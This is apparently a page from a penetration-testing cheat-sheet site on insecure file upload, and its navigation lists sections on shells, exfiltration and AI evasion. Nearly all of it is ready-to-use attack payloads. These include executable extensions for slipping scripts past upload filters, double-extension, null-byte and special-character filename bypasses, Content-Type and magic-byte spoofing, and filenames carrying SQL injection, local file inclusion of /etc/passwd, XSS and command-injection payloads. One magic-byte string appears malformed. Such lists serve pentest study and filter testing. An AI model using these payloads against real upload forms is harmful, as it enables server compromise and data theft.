pwny.cc
  • Home
  • SO
    • AI
      • Evasion
        • Exercise 1
        • Exercise 2
        • Exercise 3
        • Exercise 4
    • Android
      • adb
      • apktool
      • burp suite
      • dns spoofing
      • frida
      • intent
      • jadx
      • JNI
      • objection
      • tcpdump
      • webview
    • iOS
      • objection
    • Linux
      • Internal Recon
      • Bypasses
      • Network
      • Exfiltration
      • Containers
      • Iptables
    • Windows
      • Internal Recon
      • External Recon
      • Bypasses
      • Network
      • Exfiltration
  • SHELLS
    • Misc
    • Web Shells
    • Reverse Shells
    • Obfuscated Shells
  • WEB ATTACKS
    • Misc
    • Command Injection
    • Cross-Site Scripting (XSS)
      • XSS Tips
      • WAF Bypasses
    • Insecure Direct Object Reference (IDOR)
    • Insecure File Upload
    • Local File Inclusion (LFI)
      • Bypass Techniques
      • LFI to RCE
    • OAuth
    • Open Redirect
      • Open Redirect to XSS
    • Server Side Request Forgery (SSRF)
    • Server Side Template Injection (SSTI)
    • SQL Injection (SQLi)
      • SQLMap
      • MySQL
      • MSSQL
      • Oracle
      • PostgreSQL
    • XML External Entity (XXE)
  • OTHER
    • Cracking
      • Hashcat
      • John the Ripper
    • Sandbox Escape
Powered by GitBook
On this page
  • Defaults extensions
  • Bypasses
  • Double extensions
  • Null byte
  • Special characters
  • Content-type Bypass
  • Magic bytes
  • Triple equal
  • Filename Vulnerabilities:

Was this helpful?

  1. WEB ATTACKS

Insecure File Upload

Defaults extensions

PHP

.php
.php2
.php3
.php4
.php5
.php7
.pht
.shtml
.phps
.phar
.phpt
.pgif
.phtml
.phtm
.inc
.htaccess

ASP

.asp
.aspx
.cer
.asa
.ashx
.asmx
.axd
.cshtm
.cshtml
.rem
.soap

JSP

.jsp
.jspx
.jsw
.jspf
.jsv
.wss
.do
.action

Perl

.pl
.pm
.cgi
.lib

Coldfusion

.cfm
.cfml
.cfc
.dbm

Flash

.swf

Erland Yaws Web Server

.yaws

Bypasses

Double extensions

file.jpg.php
file.php.jpg
file.php.blah123jpg
file.png.php
file.png.Php5
file.php%00.png
file.php%0d%0a.png
file.php%0a.png
file.php\x00.png

Null byte

file.php%00.gif
file.php\x00.gif
file.php%00.png
file.php\x00.png
file.php%00.jpg
file.php\x00.jpg

Special characters

file.php......
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.pHp5....
file.%E2%80%AEphp.jpg

Content-type Bypass

#Original name but different content-type
Content-Type: image/jpeg
Content-Type: image/gif
Content-Type: image/png

Magic bytes

#Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application
PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
JPG: \xff\xd8\xff
GIF: GIF87a
GIF: GIF8

Triple equal

/?file=shell.php    <-- Blocked
/?file===shell.php  <-- Bypassed

Filename Vulnerabilities:

#Time-Based SQLi Payloads
poc.js'(select*from(select(sleep(20)))a)+'.extension

#LFI Payloads
image.png../../../../../../../etc/passwd

#XSS Payloads
'"><img src=x onerror=alert(document.domain)>.extension

#File Traversal
../../../tmp/lol.png

#Command Injection
; sleep 10;
PreviousInsecure Direct Object Reference (IDOR)NextLocal File Inclusion (LFI)

Last updated 5 months ago

Was this helpful?